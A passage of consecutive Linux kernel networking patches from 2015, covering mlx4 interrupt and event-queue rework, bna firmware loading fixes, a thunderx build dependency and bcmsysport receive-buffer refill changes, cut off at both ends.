if (msi_x) { - int nreq = dev->caps.num_ports * num_online_cpus() + MSIX_LEGACY_SZ; + int nreq = dev->caps.num_ports * num_online_cpus() + 1; nreq = min_t(int, dev->caps.num_eqs - dev->caps.reserved_eqs, nreq); @@ -2503,20 +2504,49 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) nreq = pci_enable_msix_range(dev->persist->pdev, entries, 2, nreq); - if (nreq < 0) { + if (nreq < 0 || nreq < MLX4_EQ_ASYNC) { kfree(entries); goto no_msi; - } else if (nreq < MSIX_LEGACY_SZ + - dev->caps.num_ports * MIN_MSIX_P_PORT) { - /*Working in legacy mode , all EQ's shared*/ - dev->caps.comp_pool = 0; - dev->caps.num_comp_vectors = nreq - 1; - } else { - dev->caps.comp_pool = nreq - MSIX_LEGACY_SZ; - dev->caps.num_comp_vectors = MSIX_LEGACY_SZ - 1; } - for (i = 0; i < nreq; ++i) - priv->eq_table.eq[i].irq = entries[i].vector; + /* 1 is reserved for events (asyncrounous EQ) */ + dev->caps.num_comp_vectors = nreq - 1; + + priv->eq_table.eq[MLX4_EQ_ASYNC].irq = entries[0].vector; + bitmap_zero(priv->eq_table.eq[MLX4_EQ_ASYNC].actv_ports.ports, + dev->caps.num_ports); + + for (i = 0; i < dev->caps.num_comp_vectors + 1; i++) { + if (i == MLX4_EQ_ASYNC) + continue; + + priv->eq_table.eq[i].irq = + entries[i + 1 - !!(i > MLX4_EQ_ASYNC)].vector; + + if (MLX4_IS_LEGACY_EQ_MODE(dev->caps)) { + bitmap_fill(priv->eq_table.eq[i].actv_ports.ports, + dev->caps.num_ports); + } else { + set_bit(port, + priv->eq_table.eq[i].actv_ports.ports); + } + /* We divide the Eqs evenly between the two ports. + * (dev->caps.num_comp_vectors / dev->caps.num_ports) + * refers to the number of Eqs per port + * (i.e eqs_per_port). Theoretically, we would like to + * write something like (i + 1) % eqs_per_port == 0. + * However, since there's an asynchronous Eq, we have + * to skip over it by comparing this condition to + * !!((i + 1) > MLX4_EQ_ASYNC). + */ + if ((dev->caps.num_comp_vectors > dev->caps.num_ports) && + ((i + 1) % + (dev->caps.num_comp_vectors / dev->caps.num_ports)) == + !!((i + 1) > MLX4_EQ_ASYNC)) + /* If dev->caps.num_comp_vectors < dev->caps.num_ports, + * everything is shared anyway. + */ + port++; + } dev->flags |= MLX4_FLAG_MSI_X; @@ -2526,10 +2556,15 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) no_msi: dev->caps.num_comp_vectors = 1; - dev->caps.comp_pool = 0; - for (i = 0; i < 2; ++i) + BUG_ON(MLX4_EQ_ASYNC >= 2); + for (i = 0; i < 2; ++i) { priv->eq_table.eq[i].irq = dev->persist->pdev->irq; + if (i != MLX4_EQ_ASYNC) { + bitmap_fill(priv->eq_table.eq[i].actv_ports.ports, + dev->caps.num_ports); + } + } } static int mlx4_init_port_info(struct mlx4_dev *dev, int port) @@ -2594,6 +2629,10 @@ static void mlx4_cleanup_port_info(struct mlx4_port_info *info) device_remove_file(&info->dev->persist->pdev->dev, &info->port_attr); device_remove_file(&info->dev->persist->pdev->dev, &info->port_mtu_attr); +#ifdef CONFIG_RFS_ACCEL + free_irq_cpu_rmap(info->rmap); + info->rmap = NULL; +#endif } static int mlx4_init_steering(struct mlx4_dev *dev) @@ -3024,7 +3063,7 @@ static int mlx4_load_one(struct pci_dev *pdev, int pci_dev_data, if (err) goto err_master_mfunc; - priv->msix_ctl.pool_bm = 0; + bitmap_zero(priv->msix_ctl.pool_bm, MAX_MSIX); mutex_init(&priv->msix_ctl.pool_lock); mlx4_enable_msi_x(dev); @@ -3046,7 +3085,6 @@ static int mlx4_load_one(struct pci_dev *pdev, int pci_dev_data, !mlx4_is_mfunc(dev)) { dev->flags &= ~MLX4_FLAG_MSI_X; dev->caps.num_comp_vectors = 1; - dev->caps.comp_pool = 0; pci_disable_msix(pdev); err = mlx4_setup_hca(dev); } diff --git a/drivers/net/ethernet/mellanox/mlx4/mlx4.h b/drivers/net/ethernet/mellanox/mlx4/mlx4.h index 502d3dd2c888..ff40098eaf4c 100644 --- a/drivers/net/ethernet/mellanox/mlx4/mlx4.h +++ b/drivers/net/ethernet/mellanox/mlx4/mlx4.h @@ -287,6 +287,12 @@ struct mlx4_icm_table { #define MLX4_CQE_SIZE_MASK_STRIDE 0x3 #define MLX4_EQE_SIZE_MASK_STRIDE 0x30 +#define MLX4_EQ_ASYNC 0 +#define MLX4_EQ_TO_CQ_VECTOR(vector) ((vector) - \ + !!((int)(vector) >= MLX4_EQ_ASYNC)) +#define MLX4_CQ_TO_EQ_VECTOR(vector) ((vector) + \ + !!((int)(vector) >= MLX4_EQ_ASYNC)) + /* * Must be packed because mtt_seg is 64 bits but only aligned to 32 bits. */ @@ -391,6 +397,8 @@ struct mlx4_eq { struct mlx4_buf_list *page_list; struct mlx4_mtt mtt; struct mlx4_eq_tasklet tasklet_ctx; + struct mlx4_active_ports actv_ports; + u32 ref_count; }; struct mlx4_slave_eqe { @@ -808,6 +816,7 @@ struct mlx4_port_info { struct mlx4_vlan_table vlan_table; struct mlx4_roce_gid_table gid_table; int base_qpn; + struct cpu_rmap *rmap; }; struct mlx4_sense { @@ -818,7 +827,7 @@ struct mlx4_sense { }; struct mlx4_msix_ctl { - u64 pool_bm; + DECLARE_BITMAP(pool_bm, MAX_MSIX); struct mutex pool_lock; }; diff --git a/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h b/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h index d021f079f181..edd8fd69ec9a 100644 --- a/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h +++ b/drivers/net/ethernet/mellanox/mlx4/mlx4_en.h @@ -338,7 +338,7 @@ struct mlx4_en_cq { struct napi_struct napi; int size; int buf_size; - unsigned vector; + int vector; enum cq_type is_tx; u16 moder_time; u16 moder_cnt; diff --git a/include/linux/mlx4/device.h b/include/linux/mlx4/device.h index 83e80ab94500..ad31e476873f 100644 --- a/include/linux/mlx4/device.h +++ b/include/linux/mlx4/device.h @@ -46,8 +46,9 @@ #define MAX_MSIX_P_PORT 17 #define MAX_MSIX 64 -#define MSIX_LEGACY_SZ 4 #define MIN_MSIX_P_PORT 5 +#define MLX4_IS_LEGACY_EQ_MODE(dev_cap) ((dev_cap).num_comp_vectors < \ + (dev_cap).num_ports * MIN_MSIX_P_PORT) #define MLX4_MAX_100M_UNITS_VAL 255 /* * work around: can't set values @@ -528,7 +529,6 @@ struct mlx4_caps { int num_eqs; int reserved_eqs; int num_comp_vectors; - int comp_pool; int num_mpts; int max_fmr_maps; int num_mtts; @@ -1332,10 +1332,13 @@ void mlx4_fmr_unmap(struct mlx4_dev *dev, struct mlx4_fmr *fmr, int mlx4_fmr_free(struct mlx4_dev *dev, struct mlx4_fmr *fmr); int mlx4_SYNC_TPT(struct mlx4_dev *dev); int mlx4_test_interrupts(struct mlx4_dev *dev); -int mlx4_assign_eq(struct mlx4_dev *dev, char *name, struct cpu_rmap *rmap, - int *vector); +u32 mlx4_get_eqs_per_port(struct mlx4_dev *dev, u8 port); +bool mlx4_is_eq_vector_valid(struct mlx4_dev *dev, u8 port, int vector); +struct cpu_rmap *mlx4_get_cpu_rmap(struct mlx4_dev *dev, int port); +int mlx4_assign_eq(struct mlx4_dev *dev, u8 port, int *vector); void mlx4_release_eq(struct mlx4_dev *dev, int vec); +int mlx4_is_eq_shared(struct mlx4_dev *dev, int vector); int mlx4_eq_get_irq(struct mlx4_dev *dev, int vec); int mlx4_get_phys_port_id(struct mlx4_dev *dev); From de1618034ae5704f9e503a20a1c328a0e60f6b5f Mon Sep 17 00:00:00 2001 From: Ido Shamay Date: Sun, 31 May 2015 09:30:17 +0300 Subject: [PATCH 513/872] net/mlx4_core: Move affinity hints to mlx4_core ownership Now that EQs management is in the sole responsibility of mlx4_core, the IRQ affinity hints configuration should be in its hands as well. request_irq is called only once by the first consumer (maybe mlx4_ib), so mlx4_en passes the affinity mask too late. We also need to request vectors according to the cores we want to run on. mlx4_core distribution of IRQs to cores is straight forward, EQ(i)->IRQ will set affinity hint to core i. Consumers need to request EQ vectors, according to their cores considerations (NUMA). Signed-off-by: Ido Shamay Signed-off-by: Matan Barak Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/en_cq.c | 10 +----- drivers/net/ethernet/mellanox/mlx4/eq.c | 21 +++++++++++++ drivers/net/ethernet/mellanox/mlx4/main.c | 36 ++++++++++++++++++++++ drivers/net/ethernet/mellanox/mlx4/mlx4.h | 1 + 4 files changed, 59 insertions(+), 9 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx4/en_cq.c b/drivers/net/ethernet/mellanox/mlx4/en_cq.c index d71c567eb076..63769df872a4 100644 --- a/drivers/net/ethernet/mellanox/mlx4/en_cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/en_cq.c @@ -114,7 +114,7 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, if (cq->is_tx == RX) { if (!mlx4_is_eq_vector_valid(mdev->dev, priv->port, cq->vector)) { - cq->vector = cq_idx; + cq->vector = cpumask_first(priv->rx_ring[cq->ring]->affinity_mask); err = mlx4_assign_eq(mdev->dev, priv->port, &cq->vector); @@ -160,13 +160,6 @@ int mlx4_en_activate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq, netif_napi_add(cq->dev, &cq->napi, mlx4_en_poll_tx_cq, NAPI_POLL_WEIGHT); } else { - struct mlx4_en_rx_ring *ring = priv->rx_ring[cq->ring]; - - err = irq_set_affinity_hint(cq->mcq.irq, - ring->affinity_mask); - if (err) - mlx4_warn(mdev, "Failed setting affinity hint\n"); - netif_napi_add(cq->dev, &cq->napi, mlx4_en_poll_rx_cq, 64); napi_hash_add(&cq->napi); } @@ -205,7 +198,6 @@ void mlx4_en_deactivate_cq(struct mlx4_en_priv *priv, struct mlx4_en_cq *cq) if (!cq->is_tx) { napi_hash_del(&cq->napi); synchronize_rcu(); - irq_set_affinity_hint(cq->mcq.irq, NULL); } netif_napi_del(&cq->napi); diff --git a/drivers/net/ethernet/mellanox/mlx4/eq.c b/drivers/net/ethernet/mellanox/mlx4/eq.c index 2e6fc6a860a7..11168825a9fa 100644 --- a/drivers/net/ethernet/mellanox/mlx4/eq.c +++ b/drivers/net/ethernet/mellanox/mlx4/eq.c @@ -221,6 +221,20 @@ static void mlx4_slave_event(struct mlx4_dev *dev, int slave, slave_event(dev, slave, eqe); } +static void mlx4_set_eq_affinity_hint(struct mlx4_priv *priv, int vec) +{ + int hint_err; + struct mlx4_dev *dev = &priv->dev; + struct mlx4_eq *eq = &priv->eq_table.eq[vec]; + + if (!eq->affinity_mask || cpumask_empty(eq->affinity_mask)) + return; + + hint_err = irq_set_affinity_hint(eq->irq, eq->affinity_mask); + if (hint_err) + mlx4_warn(dev, "irq_set_affinity_hint failed, err %d\n", hint_err); +} + int mlx4_gen_pkey_eqe(struct mlx4_dev *dev, int slave, u8 port) { struct mlx4_eqe eqe; @@ -1092,6 +1106,10 @@ static void mlx4_free_irqs(struct mlx4_dev *dev) for (i = 0; i < dev->caps.num_comp_vectors + 1; ++i) if (eq_table->eq[i].have_irq) { + free_cpumask_var(eq_table->eq[i].affinity_mask); +#if defined(CONFIG_SMP) + irq_set_affinity_hint(eq_table->eq[i].irq, NULL); +#endif free_irq(eq_table->eq[i].irq, eq_table->eq + i); eq_table->eq[i].have_irq = 0; } @@ -1483,6 +1501,9 @@ int mlx4_assign_eq(struct mlx4_dev *dev, u8 port, int *vector) clear_bit(*prequested_vector, priv->msix_ctl.pool_bm); *prequested_vector = -1; } else { +#if defined(CONFIG_SMP) + mlx4_set_eq_affinity_hint(priv, *prequested_vector); +#endif eq_set_ci(&priv->eq_table.eq[*prequested_vector], 1); priv->eq_table.eq[*prequested_vector].have_irq = 1; } diff --git a/drivers/net/ethernet/mellanox/mlx4/main.c b/drivers/net/ethernet/mellanox/mlx4/main.c index 3ec5113c5a33..0dbd70427221 100644 --- a/drivers/net/ethernet/mellanox/mlx4/main.c +++ b/drivers/net/ethernet/mellanox/mlx4/main.c @@ -2481,6 +2481,36 @@ static int mlx4_setup_hca(struct mlx4_dev *dev) return err; } +static int mlx4_init_affinity_hint(struct mlx4_dev *dev, int port, int eqn) +{ + int requested_cpu = 0; + struct mlx4_priv *priv = mlx4_priv(dev); + struct mlx4_eq *eq; + int off = 0; + int i; + + if (eqn > dev->caps.num_comp_vectors) + return -EINVAL; + + for (i = 1; i < port; i++) + off += mlx4_get_eqs_per_port(dev, i); + + requested_cpu = eqn - off - !!(eqn > MLX4_EQ_ASYNC); + + /* Meaning EQs are shared, and this call comes from the second port */ + if (requested_cpu < 0) + return 0; + + eq = &priv->eq_table.eq[eqn]; + + if (!zalloc_cpumask_var(&eq->affinity_mask, GFP_KERNEL)) + return -ENOMEM; + + cpumask_set_cpu(requested_cpu, eq->affinity_mask); + + return 0; +} + static void mlx4_enable_msi_x(struct mlx4_dev *dev) { struct mlx4_priv *priv = mlx4_priv(dev); @@ -2525,9 +2555,15 @@ static void mlx4_enable_msi_x(struct mlx4_dev *dev) if (MLX4_IS_LEGACY_EQ_MODE(dev->caps)) { bitmap_fill(priv->eq_table.eq[i].actv_ports.ports, dev->caps.num_ports); + /* We don't set affinity hint when there + * aren't enough EQs + */ } else { set_bit(port, priv->eq_table.eq[i].actv_ports.ports); + if (mlx4_init_affinity_hint(dev, port + 1, i)) + mlx4_warn(dev, "Couldn't init hint cpumask for EQ %d\n", + i); } /* We divide the Eqs evenly between the two ports. * (dev->caps.num_comp_vectors / dev->caps.num_ports) diff --git a/drivers/net/ethernet/mellanox/mlx4/mlx4.h b/drivers/net/ethernet/mellanox/mlx4/mlx4.h index ff40098eaf4c..f424900d23a6 100644 --- a/drivers/net/ethernet/mellanox/mlx4/mlx4.h +++ b/drivers/net/ethernet/mellanox/mlx4/mlx4.h @@ -399,6 +399,7 @@ struct mlx4_eq { struct mlx4_eq_tasklet tasklet_ctx; struct mlx4_active_ports actv_ports; u32 ref_count; + cpumask_var_t affinity_mask; }; struct mlx4_slave_eqe { From 6d90aa5cf17b1149115a002d7582b5d28ee43359 Mon Sep 17 00:00:00 2001 From: Matan Barak Date: Sun, 31 May 2015 09:30:18 +0300 Subject: [PATCH 514/872] net/mlx4_core: Make sure there are no pending async events when freeing CQ When freeing a CQ, we need to make sure there are no asynchronous events (on the ASYNC EQ) that could relate to this CQ before freeing it. This is done by introducing synchronize_irq. Signed-off-by: Matan Barak Signed-off-by: Ido Shamay Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx4/cq.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/net/ethernet/mellanox/mlx4/cq.c b/drivers/net/ethernet/mellanox/mlx4/cq.c index 7431cd4d7390..3348e646db70 100644 --- a/drivers/net/ethernet/mellanox/mlx4/cq.c +++ b/drivers/net/ethernet/mellanox/mlx4/cq.c @@ -369,6 +369,9 @@ void mlx4_cq_free(struct mlx4_dev *dev, struct mlx4_cq *cq) mlx4_warn(dev, "HW2SW_CQ failed (%d) for CQN %06x\n", err, cq->cqn); synchronize_irq(priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq->vector)].irq); + if (priv->eq_table.eq[MLX4_CQ_TO_EQ_VECTOR(cq->vector)].irq != + priv->eq_table.eq[MLX4_EQ_ASYNC].irq) + synchronize_irq(priv->eq_table.eq[MLX4_EQ_ASYNC].irq); spin_lock_irq(&cq_table->lock); radix_tree_delete(&cq_table->tree, cq->cqn); From 5e9615bfb9586055adfa32958b5fe69eec622354 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Thu, 28 May 2015 16:00:46 +0200 Subject: [PATCH 515/872] net: thunderx: add 64-bit dependency The thunderx ethernet driver fails to build on architectures that do not have an atomic readq() and writeq() function for 64-bit PCI bus access: drivers/net/ethernet/cavium/thunder/thunder_bgx.c: In function 'bgx_reg_read': include/asm-generic/io.h:195:23: error: implicit declaration of function 'readq' [-Werror=implicit-function-declaration] It seems impossible to get this driver to work on most 32-bit hardware, so it's better to add an explicit dependency, in order to let us keep building 'allmodconfig' kernels on all architectures. As the driver is meant for the internal hardware on an arm64 SoC, this is not a problem for usability. Allowing the build on all 64-bit architectures rather than just CONFIG_ARM64 on the other hand means that we get the benefit of build testing on x86. Signed-off-by: Arnd Bergmann Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/Kconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/cavium/Kconfig b/drivers/net/ethernet/cavium/Kconfig index 6365fb4242be..fc3d8e3ee807 100644 --- a/drivers/net/ethernet/cavium/Kconfig +++ b/drivers/net/ethernet/cavium/Kconfig @@ -4,7 +4,7 @@ config NET_VENDOR_CAVIUM tristate "Cavium ethernet drivers" - depends on PCI + depends on PCI && 64BIT ---help--- Enable support for the Cavium ThunderX Network Interface Controller (NIC). The NIC provides the controller and DMA From e236b954232808001f522c4b79df97b8c9262a4a Mon Sep 17 00:00:00 2001 From: Ivan Vecera Date: Thu, 28 May 2015 23:10:06 +0200 Subject: [PATCH 516/872] bna: fix firmware loading on big-endian machines Firmware required by bna is stored in appropriate files as sequence of LE32 integers. After loading by request_firmware() they need to be byte-swapped on big-endian arches. Without this conversion the NIC is unusable on big-endian machines. Cc: Rasesh Mody Signed-off-by: Ivan Vecera Signed-off-by: David S. Miller --- drivers/net/ethernet/brocade/bna/cna_fwimg.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/net/ethernet/brocade/bna/cna_fwimg.c b/drivers/net/ethernet/brocade/bna/cna_fwimg.c index ebf462d8082f..badea368bdc8 100644 --- a/drivers/net/ethernet/brocade/bna/cna_fwimg.c +++ b/drivers/net/ethernet/brocade/bna/cna_fwimg.c @@ -30,6 +30,7 @@ cna_read_firmware(struct pci_dev *pdev, u32 **bfi_image, u32 *bfi_image_size, char *fw_name) { const struct firmware *fw; + u32 n; if (request_firmware(&fw, fw_name, &pdev->dev)) { pr_alert("Can't locate firmware %s\n", fw_name); @@ -40,6 +41,12 @@ cna_read_firmware(struct pci_dev *pdev, u32 **bfi_image, *bfi_image_size = fw->size/sizeof(u32); bfi_fw = fw; + /* Convert loaded firmware to host order as it is stored in file + * as sequence of LE32 integers. + */ + for (n = 0; n < *bfi_image_size; n++) + le32_to_cpus(*bfi_image + n); + return *bfi_image; error: return NULL; From 4918eb1e7cd3b8a41ebf56b5fabaa334139b919f Mon Sep 17 00:00:00 2001 From: Ivan Vecera Date: Thu, 28 May 2015 23:10:07 +0200 Subject: [PATCH 517/872] bna: remove unreasonable iocpf timer start Driver starts iocpf timer prior bnad_ioceth_enable() call and this is unreasonable. This piece of code probably originates from Brocade/Qlogic out-of-box driver during initial import into upstream. This driver uses only one timer and queue to implement multiple timers and this timer is started at this place. The upstream driver uses multiple timers instead of this. Cc: Rasesh Mody Signed-off-by: Ivan Vecera Signed-off-by: David S. Miller --- drivers/net/ethernet/brocade/bna/bnad.c | 4 ---- 1 file changed, 4 deletions(-) diff --git a/drivers/net/ethernet/brocade/bna/bnad.c b/drivers/net/ethernet/brocade/bna/bnad.c index 37072a83f9d6..caae6cb2bc1a 100644 --- a/drivers/net/ethernet/brocade/bna/bnad.c +++ b/drivers/net/ethernet/brocade/bna/bnad.c @@ -3701,10 +3701,6 @@ bnad_pci_probe(struct pci_dev *pdev, setup_timer(&bnad->bna.ioceth.ioc.sem_timer, bnad_iocpf_sem_timeout, ((unsigned long)bnad)); - /* Now start the timer before calling IOC */ - mod_timer(&bnad->bna.ioceth.ioc.iocpf_timer, - jiffies + msecs_to_jiffies(BNA_IOC_TIMER_FREQ)); - /* * Start the chip * If the call back comes with error, we bail out. From 4818e856475b309667ee38d4d0f2e3c1b933feef Mon Sep 17 00:00:00 2001 From: Ivan Vecera Date: Thu, 28 May 2015 23:10:08 +0200 Subject: [PATCH 518/872] bna: fix soft lock-up during firmware initialization failure Bug in the driver initialization causes soft-lockup if firmware initialization timeout is reached. Polling function bfa_ioc_poll_fwinit() incorrectly calls bfa_nw_iocpf_timeout() when the timeout is reached. The problem is that bfa_nw_iocpf_timeout() calls again bfa_ioc_poll_fwinit()... etc. The bfa_ioc_poll_fwinit() should directly send timeout event for iocpf and the same should be done if firmware download into HW fails. Cc: Rasesh Mody Signed-off-by: Ivan Vecera Signed-off-by: David S. Miller --- drivers/net/ethernet/brocade/bna/bfa_ioc.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/brocade/bna/bfa_ioc.c b/drivers/net/ethernet/brocade/bna/bfa_ioc.c index 594a2ab36d31..68f3c13c9ef6 100644 --- a/drivers/net/ethernet/brocade/bna/bfa_ioc.c +++ b/drivers/net/ethernet/brocade/bna/bfa_ioc.c @@ -2414,7 +2414,7 @@ bfa_ioc_boot(struct bfa_ioc *ioc, enum bfi_fwboot_type boot_type, if (status == BFA_STATUS_OK) bfa_ioc_lpu_start(ioc); else - bfa_nw_iocpf_timeout(ioc); + bfa_fsm_send_event(&ioc->iocpf, IOCPF_E_TIMEOUT); return status; } @@ -3029,7 +3029,7 @@ bfa_ioc_poll_fwinit(struct bfa_ioc *ioc) } if (ioc->iocpf.poll_time >= BFA_IOC_TOV) { - bfa_nw_iocpf_timeout(ioc); + bfa_fsm_send_event(&ioc->iocpf, IOCPF_E_TIMEOUT); } else { ioc->iocpf.poll_time += BFA_IOC_POLL_TOV; mod_timer(&ioc->iocpf_timer, jiffies + From 3d2f6d41d1588c975d16c5969726d018bba90794 Mon Sep 17 00:00:00 2001 From: Julia Lawall Date: Thu, 28 May 2015 23:02:17 +0200 Subject: [PATCH 519/872] ipv6: drop unneeded goto Delete jump to a label on the next line, when that label is not used elsewhere. A simplified version of the semantic patch that makes this change is as follows: (http://coccinelle.lip6.fr/) // @r@ identifier l; @@ -if (...) goto l; -l: // Also remove the unnecessary ret variable. Signed-off-by: Julia Lawall Signed-off-by: David S. Miller --- net/ipv6/raw.c | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c index 484a5c144073..ca4700cb26c4 100644 --- a/net/ipv6/raw.c +++ b/net/ipv6/raw.c @@ -1327,13 +1327,7 @@ static struct inet_protosw rawv6_protosw = { int __init rawv6_init(void) { - int ret; - - ret = inet6_register_protosw(&rawv6_protosw); - if (ret) - goto out; -out: - return ret; + return inet6_register_protosw(&rawv6_protosw); } void rawv6_exit(void) From baf387a8edaa4a55afeaf4f498d3891ddcb03fb7 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 28 May 2015 15:24:42 -0700 Subject: [PATCH 520/872] net: systemport: Pre-calculate and utilize cb->bd_addr There is a 1:1 mapping between the software maintained control block in priv->rx_cbs and the buffer address in priv->rx_bds, such that there is no need to keep computing the buffer address when refiling a control block. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bcmsysport.c | 18 +++++++++--------- drivers/net/ethernet/broadcom/bcmsysport.h | 2 -- 2 files changed, 9 insertions(+), 11 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bcmsysport.c b/drivers/net/ethernet/broadcom/bcmsysport.c index 084a50a555de..267330ccd595 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.c +++ b/drivers/net/ethernet/broadcom/bcmsysport.c @@ -549,12 +549,7 @@ static int bcm_sysport_rx_refill(struct bcm_sysport_priv *priv, } dma_unmap_addr_set(cb, dma_addr, mapping); - dma_desc_set_addr(priv, priv->rx_bd_assign_ptr, mapping); - - priv->rx_bd_assign_index++; - priv->rx_bd_assign_index &= (priv->num_rx_bds - 1); - priv->rx_bd_assign_ptr = priv->rx_bds + - (priv->rx_bd_assign_index * DESC_SIZE); + dma_desc_set_addr(priv, cb->bd_addr, mapping); netif_dbg(priv, rx_status, ndev, "RX refill\n"); @@ -568,7 +563,7 @@ static int bcm_sysport_alloc_rx_bufs(struct bcm_sysport_priv *priv) unsigned int i; for (i = 0; i < priv->num_rx_bds; i++) { - cb = &priv->rx_cbs[priv->rx_bd_assign_index]; + cb = &priv->rx_cbs[i]; if (cb->skb) continue; @@ -1330,14 +1325,14 @@ static inline int tdma_enable_set(struct bcm_sysport_priv *priv, static int bcm_sysport_init_rx_ring(struct bcm_sysport_priv *priv) { + struct bcm_sysport_cb *cb; u32 reg; int ret; + int i; /* Initialize SW view of the RX ring */ priv->num_rx_bds = NUM_RX_DESC; priv->rx_bds = priv->base + SYS_PORT_RDMA_OFFSET; - priv->rx_bd_assign_ptr = priv->rx_bds; - priv->rx_bd_assign_index = 0; priv->rx_c_index = 0; priv->rx_read_ptr = 0; priv->rx_cbs = kcalloc(priv->num_rx_bds, sizeof(struct bcm_sysport_cb), @@ -1347,6 +1342,11 @@ static int bcm_sysport_init_rx_ring(struct bcm_sysport_priv *priv) return -ENOMEM; } + for (i = 0; i < priv->num_rx_bds; i++) { + cb = priv->rx_cbs + i; + cb->bd_addr = priv->rx_bds + i * DESC_SIZE; + } + ret = bcm_sysport_alloc_rx_bufs(priv); if (ret) { netif_err(priv, hw, priv->netdev, "SKB allocation failed\n"); diff --git a/drivers/net/ethernet/broadcom/bcmsysport.h b/drivers/net/ethernet/broadcom/bcmsysport.h index 42a4b4a0bc14..f28bf545d7f4 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.h +++ b/drivers/net/ethernet/broadcom/bcmsysport.h @@ -663,8 +663,6 @@ struct bcm_sysport_priv { /* Receive queue */ void __iomem *rx_bds; - void __iomem *rx_bd_assign_ptr; - unsigned int rx_bd_assign_index; struct bcm_sysport_cb *rx_cbs; unsigned int num_rx_bds; unsigned int rx_read_ptr; From c73b01837eeeba91b9c22c67c6372a6b73f08473 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Thu, 28 May 2015 15:24:43 -0700 Subject: [PATCH 521/872] net: systemport: rewrite bcm_sysport_rx_refill Currently, bcm_sysport_desc_rx() calls bcm_sysport_rx_refill() at the end of Rx packet processing loop, after the current Rx packet has already been passed to napi_gro_receive(). However, bcm_sysport_rx_refill() might fail to allocate a new Rx skb, thus leaving a hole on the Rx queue where no valid Rx buffer exists. To eliminate this situation: 1. Rewrite bcm_sysport_rx_refill() to retain the current Rx skb on the Rx queue if a new replacement Rx skb can't be allocated and DMA-mapped. In this case, the data on the current Rx skb is effectively dropped. 2. Modify bcm_sysport_desc_rx() to call bcm_sysport_rx_refill() at the top of Rx packet processing loop, so that the new replacement Rx skb is already in place before the current Rx skb is processed. This is loosely inspired from d6707bec5986 ("net: bcmgenet: rewrite bcmgenet_rx_refill()") Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/ethernet/broadcom/bcmsysport.c | 81 +++++++++++----------- 1 file changed, 41 insertions(+), 40 deletions(-) diff --git a/drivers/net/ethernet/broadcom/bcmsysport.c b/drivers/net/ethernet/broadcom/bcmsysport.c index 267330ccd595..d777b0db9e63 100644 --- a/drivers/net/ethernet/broadcom/bcmsysport.c +++ b/drivers/net/ethernet/broadcom/bcmsysport.c @@ -524,62 +524,70 @@ static void bcm_sysport_free_cb(struct bcm_sysport_cb *cb) dma_unmap_addr_set(cb, dma_addr, 0); } -static int bcm_sysport_rx_refill(struct bcm_sysport_priv *priv, - struct bcm_sysport_cb *cb) +static struct sk_buff *bcm_sysport_rx_refill(struct bcm_sysport_priv *priv, + struct bcm_sysport_cb *cb) { struct device *kdev = &priv->pdev->dev; struct net_device *ndev = priv->netdev; + struct sk_buff *skb, *rx_skb; dma_addr_t mapping; - int ret; - cb->skb = netdev_alloc_skb(priv->netdev, RX_BUF_LENGTH); - if (!cb->skb) { + /* Allocate a new SKB for a new packet */ + skb = netdev_alloc_skb(priv->netdev, RX_BUF_LENGTH); + if (!skb) { + priv->mib.alloc_rx_buff_failed++; netif_err(priv, rx_err, ndev, "SKB alloc failed\n"); - return -ENOMEM; + return NULL; } - mapping = dma_map_single(kdev, cb->skb->data, + mapping = dma_map_single(kdev, skb->data, RX_BUF_LENGTH, DMA_FROM_DEVICE); - ret = dma_mapping_error(kdev, mapping); - if (ret) { + if (dma_mapping_error(kdev, mapping)) { priv->mib.rx_dma_failed++; - bcm_sysport_free_cb(cb); + dev_kfree_skb_any(skb); netif_err(priv, rx_err, ndev, "DMA mapping failure\n"); - return ret; + return NULL; } + /* Grab the current SKB on the ring */ + rx_skb = cb->skb; + if (likely(rx_skb)) + dma_unmap_single(kdev, dma_unmap_addr(cb, dma_addr), + RX_BUF_LENGTH, DMA_FROM_DEVICE); + + /* Put the new SKB on the ring */ + cb->skb = skb; dma_unmap_addr_set(cb, dma_addr, mapping); dma_desc_set_addr(priv, cb->bd_addr, mapping); netif_dbg(priv, rx_status, ndev, "RX refill\n"); - return 0; + /* Return the current SKB to the caller */ + return rx_skb; } static int bcm_sysport_alloc_rx_bufs(struct bcm_sysport_priv *priv) { struct bcm_sysport_cb *cb; - int ret = 0; + struct sk_buff *skb; unsigned int i; for (i = 0; i < priv->num_rx_bds; i++) { cb = &priv->rx_cbs[i]; - if (cb->skb) - continue; - - ret = bcm_sysport_rx_refill(priv, cb); - if (ret) - break; + skb = bcm_sysport_rx_refill(priv, cb); + if (skb) + dev_kfree_skb(skb); + if (!cb->skb) + return -ENOMEM; } - return ret; + return 0; } /* Poll the hardware for up to budget packets to process */ static unsigned int bcm_sysport_desc_rx(struct bcm_sysport_priv *priv, unsigned int budget) { - struct device *kdev = &priv->pdev->dev; struct net_device *ndev = priv->netdev; unsigned int processed = 0, to_process; struct bcm_sysport_cb *cb; @@ -587,7 +595,6 